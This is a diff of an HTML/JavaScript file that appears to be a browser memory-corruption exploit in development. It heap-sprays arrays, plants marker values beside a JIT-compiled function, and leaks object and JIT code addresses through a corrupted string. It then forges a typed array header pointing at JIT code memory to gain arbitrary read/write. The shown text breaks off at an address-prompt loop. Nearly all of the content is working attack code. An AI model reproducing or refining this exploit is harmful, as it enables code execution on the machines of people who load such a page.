--- a/array.html
+++ b/array.html
@@ -1,14 +1,22 @@
 <script>	
-alert("start28");
+alert("start30");
+function func(){
+for(var i=0;i<0x1000;i++){ 
+
+ }
+}
+func();
 var spray=new Array(0x800);
 var tmp;
  for(var i=0;i<spray.length;i++){
   if(i%3==1){
  spray[i]=new Array(0x1e00);
   tmp=spray[i];
- for(var j=0;j<0x1e00;j+=2){
+ for(var j=0;j<0x1e00;j+=4){
   tmp[j]=spray;
-  tmp[j+1]=i;
+  tmp[j+1]=0x6666;
+  tmp[j+2]=func;
+  tmp[j+3]=0x7777;
   }
   }else{
  spray[i]=new Uint32Array(0x10000/4);
@@ -96,20 +104,27 @@ alert(spray_index.toString(16));
  var typedarray_index=s1.charCodeAt(a+1);
  alert(typedarray_index.toString(16));
 a=0x50010000/2;
-while(s1.charCodeAt(a)!=0xFFFB){
+while(s1.charCodeAt(a)!=0x6666){
  a+=1;
 }
-var arr_addr=(s1.charCodeAt(a-1)<<16)+s1.charCodeAt(a-2)
+var arr_addr=(s1.charCodeAt(a-2)<<16)+s1.charCodeAt(a-3)
+var func_addr=(s1.charCodeAt(a-5)<<16)+s1.charCodeAt(a+4);
 alert(arr_addr.toString(16));
+alert(func_addr.toString(16));
 a=arr_addr/2;
 var vftable=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
 alert(vftable.toString(16));
+a=(func_addr+0x30)/2;
+var p_addr=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
+a=(p_addr+0x10)/2;
+var jitcode_addr=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
+alert(jitcode_addr.toString(16));
 for(var i=typedarray_index;i<typedarray_index+0x40/4;i++){
  spray[spray_index][i]=0;
 }
 spray[spray_index][typedarray_index]=vftable;
 spray[spray_index][typedarray_index+0x30/4]=0x10000;//length
-spray[spray_index][typedarray_index+0x38/4]=0xffffffff;//addr;
+spray[spray_index][typedarray_index+0x38/4]=jitcode_addr-0x14;//addr;
 while(1){
 a=prompt("addr");
 b="";
